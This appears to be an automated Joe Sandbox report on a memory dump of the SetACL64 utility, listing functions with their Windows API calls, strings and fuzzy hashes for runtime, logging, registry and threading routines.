Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalEnterEventMutexReleaseSection
String ID: %s$UNKNW,
API String ID: 995701069-1666316639
Opcode ID: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
Instruction ID: 0410017a460c161042bf2ef77a2c7031cb725082661a18f3f957704836942e76
Opcode Fuzzy Hash: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
Instruction Fuzzy Hash: AF5191E2A19A86C1EA04DB25D59837D2362FF44B84F415439CA1D8B7A2DF7EEC44C320

Function 00007FF68683CD0A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 226
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF68683D0A0: EnterCriticalSection.KERNEL32 ref: 00007FF68683D0CB

Part of subcall function 00007FF686834FC0: GetModuleFileNameW.KERNEL32 ref: 00007FF68683503A

RegisterEventSourceW.ADVAPI32 ref: 00007FF68683CFAC
LeaveCriticalSection.KERNEL32 ref: 00007FF68683D051
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D084
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D08A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683D090

Strings

DefaultEventSource, xrefs: 00007FF68683CDE1

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
String ID: DefaultEventSource
API String ID: 352910984-1672983561
Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
Instruction ID: 2341e1106d9bb87b406ea7b9219e5e7204037fb8b3fa904901ebbdec40725e6c
Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
Instruction Fuzzy Hash: 5EA17FA2A14B81C5EF008F38D5593AD2361FF5479CF408639E76C46AEADF7AE990C310

Function 00007FF686821649 Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF686821653
LeaveCriticalSection.KERNEL32 ref: 00007FF686821667
EnterCriticalSection.KERNEL32 ref: 00007FF68682169C
CloseHandle.KERNEL32 ref: 00007FF6868216B0
DeregisterEventSource.ADVAPI32 ref: 00007FF6868216C9
LeaveCriticalSection.KERNEL32 ref: 00007FF6868216D9

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
String ID:
API String ID: 1038480651-0
Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
Instruction ID: 01282b4f724d8db2e810c013bc1b0ad67a049cfbad9f96916154a0a70914a905
Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
Instruction Fuzzy Hash: AD0140B1A5C546CAFA649B15B8A83386351BFC8B42F040539CA8EC62B1CF2FAC44C220

Function 00007FF68684B710 Relevance: 7.7, APIs: 5, Instructions: 167
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812
RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B913
RegCloseKey.ADVAPI32 ref: 00007FF68684B935
RegCloseKey.ADVAPI32 ref: 00007FF68684B9EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC21
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC27
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684BC33

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
String ID:
API String ID: 315095564-0
Opcode ID: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
Instruction ID: f17295a7acbb393cbc26fbf098ac0917ac34fda75c2bf7f700e9551725c7babe
Opcode Fuzzy Hash: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
Instruction Fuzzy Hash: AF61A0B2B18B8189E710CB65E4443AD63A6FF88798F000139DF8C97A99DF7DD851C350

Function 00007FF68686E62C Relevance: 7.6, APIs: 5, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686E650
CreateThread.KERNELBASE ref: 00007FF68686E691
GetLastError.KERNEL32 ref: 00007FF68686E69F
CloseHandle.KERNEL32 ref: 00007FF68686E6BC
FreeLibrary.KERNEL32 ref: 00007FF68686E6CB

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
Instruction ID: 4f4e6655c75991c81f382e311add3e66d325f98655b955f22151f194085fd6e3
Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
Instruction Fuzzy Hash: 14217CA1A1D746C7EE14DB65B41C17A62A1BF84B80F040438DB4E8BB65DE3EEC00C720

Function 00007FF686877C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877C49
CompareStringEx.KERNELBASE ref: 00007FF686877C9D
CompareStringW.KERNEL32 ref: 00007FF686877CD1

Strings

CompareStringEx, xrefs: 00007FF686877C3D

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CompareString$try_get_function
String ID: CompareStringEx
API String ID: 3689094840-2590796910
Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
Instruction ID: 7bfabdca1d66a2a3f9f3a2324ae164c7a885d269652f01ccad6e996147076fdf
Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
Instruction Fuzzy Hash: 3611F476A08B81C6D760CB56B4402AAB7A5FBC9B94F54413AEE8D83B59CF3DD850CB40

Function 00007FF686877F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF686877F5D
GetUserDefaultLocaleName.KERNELBASE(?,?,000000A0,00007FF6868764C4), ref: 00007FF686877F6C
GetUserDefaultLCID.KERNEL32(?,?,000000A0,00007FF6868764C4), ref: 00007FF686877F74

Strings

GetUserDefaultLocaleName, xrefs: 00007FF686877F40, 00007FF686877F4A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: DefaultUser$LocaleNametry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 1828775994-151340334
Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
Instruction ID: 05d9bead7f0838353dfe26d75060d3004569bf9f1f0d959f80ae06c94cb722ba
Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
Instruction Fuzzy Hash: C5F082D0F0D542D2FB159BA5A6816F85262BF897C4F84503EEA0D86A65CE3E9C44C760

Function 00007FF6868622FC Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF686862310

Part of subcall function 00007FF6868624C8: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6868624EA

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF686862325
__scrt_release_startup_lock.LIBCMT ref: 00007FF686862393
__scrt_is_managed_app.LIBCMT ref: 00007FF68686240A

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
String ID:
API String ID: 1321466686-0
Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
Instruction ID: 8e55ef543592d83e15f5f4f303edf39ddf02620efcdaf2e0f01c5c7ed0162edb
Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
Instruction Fuzzy Hash: 50311CA1A18207C2FA54AB24956A3B923A1BF45784F44407DEB4DC72E7DE6FEC04C271

Function 00007FF68686B6DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686B714
_invalid_parameter_noinfo.LIBCMT ref: 00007FF68686B94A

Strings

*, xrefs: 00007FF68686B823

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
Instruction ID: d9db731998cd69f38668c40e0926809cc0251caa76e6e6a7f9c0f6c02a62f5e2
Opcode Fuzzy Hash: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
Instruction Fuzzy Hash: FA7183B2968252CAE7685F29805917C3BA6FF05B9CF14013DDB4E832A5DF3ADC61D720

Function 00007FF686879DFC Relevance: 4.6, APIs: 3, Instructions: 84COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF686879E19

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
Instruction ID: cb9d928fbc81a6f574a27b2e87fc4c36a9dc7a536c2f28ab6676619084e45aa6
Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
Instruction Fuzzy Hash: 9331B2F2F1C286C6FE605B15A44427E62A0BF41B90F544138FA6D877D6DEAEEC80C720

Function 00007FF68683DBB8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

%s, xrefs: 00007FF68683DC4B
CRTCL,, xrefs: 00007FF68683DBBE

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$CRTCL,
API String ID: 3988221542-3126492506
Opcode ID: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
Instruction ID: c1336558399e9978695b06de419bb5e68287b28f16c2204c8023a805ffc7f616
Opcode Fuzzy Hash: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
Instruction Fuzzy Hash: DB218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360

Function 00007FF68683DB7C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

WARN ,, xrefs: 00007FF68683DB82
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$WARN ,
API String ID: 3988221542-3785767073
Opcode ID: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
Instruction ID: 94ec21e71a35c75c73d903f0950ca0891fd00adfc18471546a05abaf0d527c39
Opcode Fuzzy Hash: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
Instruction Fuzzy Hash: 9E218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360

Function 00007FF68683DB9A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

ERROR,, xrefs: 00007FF68683DBA0
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$ERROR,
API String ID: 3988221542-2486372128
Opcode ID: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
Instruction ID: 6f97fc8dcd2a94427c30544f1ea6cf847d3ce5060d0428e265c58a7bdcc3ba64
Opcode Fuzzy Hash: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
Instruction Fuzzy Hash: 3C218EE1A28A82C0FA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360

Function 00007FF68683DBD6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

%s, xrefs: 00007FF68683DC4B
NONE ,, xrefs: 00007FF68683DBD6

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$NONE ,
API String ID: 3988221542-1825952341
Opcode ID: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
Instruction ID: a39bc4c2b0b0eec86f14d6d8857a5336f15b75a23feaa9da804d6cfe7f99d67d
Opcode Fuzzy Hash: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
Instruction Fuzzy Hash: 0A215EE2A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360

Function 00007FF68683DB6A Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

DEBUG,, xrefs: 00007FF68683DB6A
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$DEBUG,
API String ID: 3988221542-4222748730
Opcode ID: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
Instruction ID: c896ced5c6946f9d38d80ba34c12e247d80a2698bd2acdc86c964ed8d9fd544f
Opcode Fuzzy Hash: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
Instruction Fuzzy Hash: AD215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360

Function 00007FF68683DB73 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF68683DCBF

Strings

INFO ,, xrefs: 00007FF68683DB73
%s, xrefs: 00007FF68683DC4B

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: CriticalLeaveSection
String ID: %s$INFO ,
API String ID: 3988221542-2224252516
Opcode ID: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
Instruction ID: 7bbc6948b846f3cf8d721f176df0d063582e63bbddc437c88f266e96b764c0b2
Opcode Fuzzy Hash: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
Instruction Fuzzy Hash: 27215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360

Function 00007FF68686E568 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686873FE0: GetLastError.KERNEL32(?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF686873FEF
Part of subcall function 00007FF686873FE0: SetLastError.KERNEL32(?,?,0000F23FCA72FB90,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF68687408D

CloseHandle.KERNEL32(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5A3
FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5B9

Part of subcall function 00007FF686878230: try_get_function.LIBVCRUNTIME ref: 00007FF68687824E

ExitThread.KERNEL32 ref: 00007FF68686E5C2

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
String ID:
API String ID: 1393601959-0
Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
Instruction ID: dceb4f7df0669c43fef2206f225f772f35979a768d0fad60ad255de6074ecd47
Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
Instruction Fuzzy Hash: 67F03CA1A18A86C2EE145B20905C27C22A5BF84B74F184B3DD73C822E5EF2ADC45C360

Function 00007FF6868730B0 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6868730AF), ref: 00007FF6868730D9
